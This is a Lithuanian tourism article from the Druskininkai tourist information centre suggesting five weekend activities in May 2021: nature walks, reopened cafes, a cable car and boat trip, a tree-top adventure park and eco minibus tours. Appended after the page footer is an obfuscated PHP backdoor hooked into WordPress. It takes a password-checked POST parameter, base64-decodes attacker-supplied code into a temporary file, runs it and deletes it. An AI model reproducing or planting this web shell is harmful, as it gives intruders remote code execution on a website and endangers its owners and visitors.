fbpx
A A
A A

Druskininkai: TOP 5 idėjos savaitgaliui (gegužės 14-16)

2021.05.05

Jūsų dėmesiui – 5 idėjos savaitgaliui, kurias galite išbandyti Druskininkų kurorte. Gamtos prieglobstis, Druskininkai iš oro ir vandens, nuotykiai medžių viršūnėse ir kitos pramogos visai šeimai.

Perskyrimas

Gamtos prieglobstis – #pirmikartai Druskininkuose

Idėja savaitgaliui Druskininkuose - gamtos prieglobstis
Druskininkų ir jų apylinkių gamta įkvėpia iš naujo išgyventiems pirmiems kartams.

Druskininkai – miškingiausias Lietuvos kurortas. Miesto centre žaliuoja medžiai, kurortą supa šimtamečiai pušynai. Ramiam atokvėpiui kviečia gamtos oazės kampeliai – parkai ir lauko muziejai. Kurorto gamta padeda atsipalaiduoti, sumažinti stresą ir įtampą. Tai, ko mums visiems taip reikia dabar.

Ne veltui sakoma, kad ir oras čia gydo. Deguonies terapijos procedūromis galite mėgautis ne tik sveikatinimo ir grožio centruose – kurortą supančių pušynų dėka Druskininkų oras prisotintas organizmui reikalingais elementais. Užtenka išeiti ilgesniam pasivaikščiojimui, ar išvažiuoti dviračiais ir Jūs jau mėgaujatės oro terapija.

Užfiksuotas akimirkas galėsite įamžinti momentinėje nuotraukoje ir visiškai nemokamai ją atsispausdinti Druskininkų turistų informacijos centre.

Daugiau apie pirmuosius kartus Druskininkuose skaitykite čia.

Perskyrimas

Gurmaniški potyriai ir išsiilgtas kavos puodelis

Idėja savaitgaliui Druskininkuose - kavinės ir restoranai

Po ilgos pertraukos vėl atsidariusios geriausios Druskininkų kavinės ir restoranai siūlo įkvepiančius tobulam poilsiui vaizdus iš lauko terasų ir gurmaniškas naujo sezono naujienas.

Jūsų patogumui siūlome jau veikiančių Druskininkų kavinių, restoranų ir kitų maitinimo įstaigų sąrašą. Jame rasite ir visiškai naujų veidų – kurorto kulinarinį žemėlapį papildė ir japoniškos virtuvės atstovai.
Raskite tobulą vietą pietums, o net ir pačios geriausios idėjos savaitgaliui neapsieina be puodelio kavos. Tai per karantino laikotarpį viena labiausiai išsiilgtų patirčių.

Perskyrimas

Druskininkai iš oro ir vandens

Idėjos savaitgaliui Druskininkuose - Lynų keltuvas

Unikalios Druskininkų pramogos „Lynų kelio“ kabinos savo duris miesto svečiams ir gyventojams jau atvėrė savo duris. Siūlome išbandyti naujovę ir puikią idėją savaitgaliui – ne tik pakilkite virš Druskininkų pušų ir grožėkitės nuostabia kurorto panorama, bet išbandykite ir komfortišką pasiplaukiojimą Nemunu iki Meilės salos.

Įsigyk bilietą iškart dviem kelionėms oro ir vandens keliais – nepamirštami įspūdžiai už mažiausią kainą garantuoti. Bendro bilieto teiraukis „Lynų kelio“ stotelėse.
Kelionės metu grožėkis žymiausiais Druskininkų objektais, išgirsk dar negirdėtų legendų iš kurorto istorijos – patyrės laivo kapitonas atskleis ne vieną paslaptį apie Druskininkuose paslėptus lobius.

Laivu plukdoma nuo gegužės 1 d. iki spalio 15 d. Plaukimo laiką būtina rezervuoti iš anksto tel. +37068615814.

„Lynų kelio“ darbo laikas: 10.00-19.45. Šį savaitgalį – nuo ketvirtadienio iki sekmadienio, nuo gegužės 12 d. – kiekvieną dieną!

Perskyrimas

  „Uno parkas“ – nuotykiai medžių viršūnėse sugrįžta

Idėjos savaitgaliui Druskininkuose – Uno parkas

„Uno“ nuotykių parkas kviečia pramogauti medžiuose ištisus metus. Tai aktyvi, fizinio pasirengimo nereikalaujanti  pramoga, skirta visoms amžiaus grupėms.

Iš koto verčiantys nuotykiai bus neužmirštami visai šeimai – vaikai galės karstytis tinklais, medžių viršūnėmis, lakstyti, šėlti nameliuose medžiuose.  Nėra blogo oro – yra tik didelis noras būti gamtoje ir gerai leisti laiką.

Nebijokit lietaus! Tiesiog pasirūpinkite neperšlampama apranga. Kai užklumpa nedidelis lietus, „Uno“ nuotykių parkas dirba tam, kad užtikrintų jums kuo įvairesnes patirtis.

Patariame apsilankymą nuotykių parke rezervuotis iš anksto el. paštu: dalia@unoparks.lt arba telefonu: (8-641) 36796.

Perskyrimas

Ekologišku autobusiuku po Druskininkus

Idėjos savaitgaliui Druskininkuose - Eco Tours

Druskininkai Eco Tours, organizuojantys pažintinius miesto turus po gražiausias ir istoriškai svarbiausias kurorto vietas, atnaujina ekskursijas! Mėgaukitės įdomiais pasakojimais apie kurorto praeitį ir dabartį važiuodami ekologiška ir smagia transporto priemone.

Šis nuotykis puikiai tinka šeimoms, ar tiesiog norintiems geriau pažinti Druskininkus kurorto svečiams. Turo trukmė – 40 min.

Nepailstantys „Eco Tours“ autobusiukai, kiekvieną savaitgalį skleidžiantys vasarišką kelionių nuotaiką, laukia jūsų. Daugiau informacijos – www.ecotours.lt ir tel. (8-677) 60636.

Perskyrimas

Lankydamiesi Druskininkuose, laikykitės saugumo reikalavimų ir karantino metu galiojančių rekomendacijų! Sveikata svarbiausia.

Parengė Druskininkų turizmo ir verslo informacijos centras

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}